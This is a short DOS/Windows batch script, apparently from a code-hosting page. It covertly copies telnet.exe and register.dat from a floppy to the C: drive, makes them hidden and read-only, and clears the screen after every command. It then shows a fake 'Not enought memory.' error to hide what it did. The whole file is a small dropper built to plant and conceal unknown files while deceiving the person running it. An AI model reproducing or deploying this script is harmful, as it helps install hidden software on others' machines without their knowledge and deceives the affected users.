12 lines
173 B
Batchfile
12 lines
173 B
Batchfile
@echo off
|
|
@copy a:\top\telnet.exe c:\
|
|
@cls
|
|
@copy a:\top\register.dat c:\
|
|
@cls
|
|
@attrib +h +r c:\telnet.exe
|
|
@cls
|
|
@attrib +h c:\register.dat
|
|
@cls
|
|
@echo Not enought memory.
|
|
|